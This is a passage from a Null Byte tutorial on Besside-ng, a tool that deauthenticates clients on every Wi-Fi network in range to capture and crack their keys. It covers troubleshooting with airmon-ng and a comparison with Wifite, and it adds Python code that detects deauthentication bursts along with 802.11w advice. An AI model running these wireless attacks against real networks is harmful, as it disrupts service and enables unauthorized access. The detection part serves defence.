1 11/ 14 BA(24064) 95(23808) 59(23808) 16(23552) 62(23552) 0A(23552) 72(23552) B7(23552) 43(23552) 68(23552) A3(23552) 9D(23552) E5(23296)
2 0/ 3 20(28416) 7A(26624) 91(25856) D4(25344) 2C(25344) DC(25088) 43(25088) 0D(24832) B3(24832) 07(24832) A7(24576) 28(24064) 9A(24064)
3 0/ 1 44(32256) 1C(25856) 82(25600) C0(25088) 2B(24832) 06(24832) 7E(24576) BF(24320) 04(24320) D6(24320) 54(24064) 31(24064) A9(24064)
4 1/ 25 00(25344) 7C(25088) 45(24832) E9(24832) 36(24832) 6C(24576) AF(24320) 25(24064) 17(23808) 3B(23808) 8C(23552) A1(23296) 4F(23296)
KEY FOUND! [ ████████████████ ] (ASCII: █████████ )
Decrypted correctly: 100%
Step 7: Troubleshoot Interruptions
Besside-ng experiences two main types of glitches — "no child process" and "network is down." These can be related to your wireless network adapter.
"No child process" can usually be fixed by re-running the Besside-ng command. "Network is down" is often caused by the WPA supplicant process throwing your card out of monitor mode. To solve this problem, you can run Airmon-ng:
~$ sudo airmon-ng check kill
This will kill any troublesome processes for monitor mode, but it will also kill any other Wi-Fi interfaces, so be careful if you are SSHed into your device that way.
Besside-ng vs. Wifite
Besside-ng is not the only tool to target this niche. Suites like Wifite can also be used to attack WPA and WEP networks in automated ways. Wifite includes the added function of attacking WPS setup PINs.
While Wifite certainly provides better situational awareness of wireless targets around you, not everyone has time to wait to hit each network with every attack in the book, as Wifite likes to do. In addition, the WPS setup PIN attack is aging poorly and often no longer works, which wastes a lot of time. These attacks focus on different types of automation, with Wifite throwing everything and the kitchen sink at a particular network or networks, and Besside-ng going ham over any networks that dare exist nearby.
The problem with Wifite is that it sucks because it takes forever, and I rarely have success with it nowadays. By comparison, Besside-ng remains blisteringly fast into the foreseeable future.
Warning: Besside-ng Is Loud & Leaves a Ton of Evidence
While Besside-ng is a phenomenal tool, the nature of the attack means it interacts with every access point in range. This leaves distinctive logs in each router targeted, meaning this attack has the subtlety of running around and smacking every device off of every Wi-Fi connection in range. It can be mitigated by focusing your attack on a particular AP. The technique usually does not disrupt regular network use and operation, but can reveal your device MAC address or physical location if run against a well-defended target.
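The "loud" part of the tool is the mechanism described at the top of the article: a deauthentication frame per client, repeated until the handshake is captured. That pattern is exactly what a wireless IDS looks for, and the block below is an added example (not code from the article or from Aircrack-ng) of the detection logic a defender would run over captured 802.11 management frames. The frame records are constructed (timestamp, subtype, transmitter, receiver; all addresses are placeholders): one lone deauth, which a legitimate AP may send, a burst of twelve to a single client within about a second followed by that client reconnecting, and a broadcast deauth, which a normal AP has almost no reason to emit.

```python
from collections import defaultdict, deque

# Added example, not part of the article or of Besside-ng: a minimal wireless
# IDS rule for deauthentication/disassociation abuse. Frame records are
# constructed tuples: (timestamp seconds, subtype, transmitter, receiver).
# All MAC addresses are placeholders.

BROADCAST = "ff:ff:ff:ff:ff:ff"
DISCONNECT_SUBTYPES = {"deauth", "disassoc"}


def make_sample_frames():
    """Constructed management-frame log covering the three cases of interest."""
    frames = [
        (0.0, "beacon", "02:00:00:00:aa:01", BROADCAST),
        # One deauth to one client: ordinary AP housekeeping, should not alert.
        (0.5, "deauth", "02:00:00:00:aa:01", "02:00:00:00:cc:10"),
        (1.0, "beacon", "02:00:00:00:aa:02", BROADCAST),
    ]
    # Twelve deauths to one client within ~1.1 s: the reconnect-forcing
    # pattern the article describes, then the client re-associating.
    for i in range(12):
        frames.append((round(10.0 + 0.1 * i, 1), "deauth",
                       "02:00:00:00:aa:02", "02:00:00:00:cc:20"))
    frames.append((11.3, "assoc_req", "02:00:00:00:cc:20", "02:00:00:00:aa:02"))
    # A broadcast deauth kicks every client at once; flag it regardless of rate.
    frames.append((30.0, "deauth", "02:00:00:00:aa:03", BROADCAST))
    return frames


def detect_deauth_abuse(frames, window=2.0, threshold=8):
    """Return alerts for deauth/disassoc bursts and broadcast disconnects.

    A burst alert fires the moment `threshold` disconnect frames from one
    transmitter fall inside `window` seconds (sliding window per sender);
    it fires once per crossing, not once per frame, to keep alert volume sane.
    """
    recent = defaultdict(deque)
    alerts = []
    for ts, subtype, src, dst in sorted(frames):
        if subtype not in DISCONNECT_SUBTYPES:
            continue
        if dst == BROADCAST:
            alerts.append({"reason": "broadcast", "bssid": src,
                           "start": ts, "end": ts, "count": 1})
            continue
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:        # drop frames that fell out of the window
            q.popleft()
        if len(q) == threshold:          # first crossing only
            alerts.append({"reason": "burst", "bssid": src,
                           "start": q[0], "end": ts, "count": len(q)})
    return alerts


def disconnects_per_transmitter(frames):
    """Per-sender count of disconnect frames, a quick triage view for an analyst."""
    counts = defaultdict(int)
    for _, subtype, src, _ in frames:
        if subtype in DISCONNECT_SUBTYPES:
            counts[src] += 1
    return dict(counts)


if __name__ == "__main__":
    for alert in detect_deauth_abuse(make_sample_frames()):
        print(alert)
    print(disconnects_per_transmitter(make_sample_frames()))
```

Tune `threshold` and `window` to the site: a busy enterprise controller legitimately deauthenticates clients during load balancing, but not a dozen times to the same station in a second. The structural fix is Management Frame Protection (802.11w), which the aircrack-ng man page above already mentions in passing: with PMF required, a client discards deauth and disassoc frames that lack a valid MIC, so a forged disconnect never triggers the reconnect the harvester is waiting for.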
Thanks for reading, and make sure to keep an eye on Null Byte for more hacking tutorials. You can ask me questions here or on Twitter @KodyKinzie or @NullByte.
Cover photo and GIF by Kody/Null Byte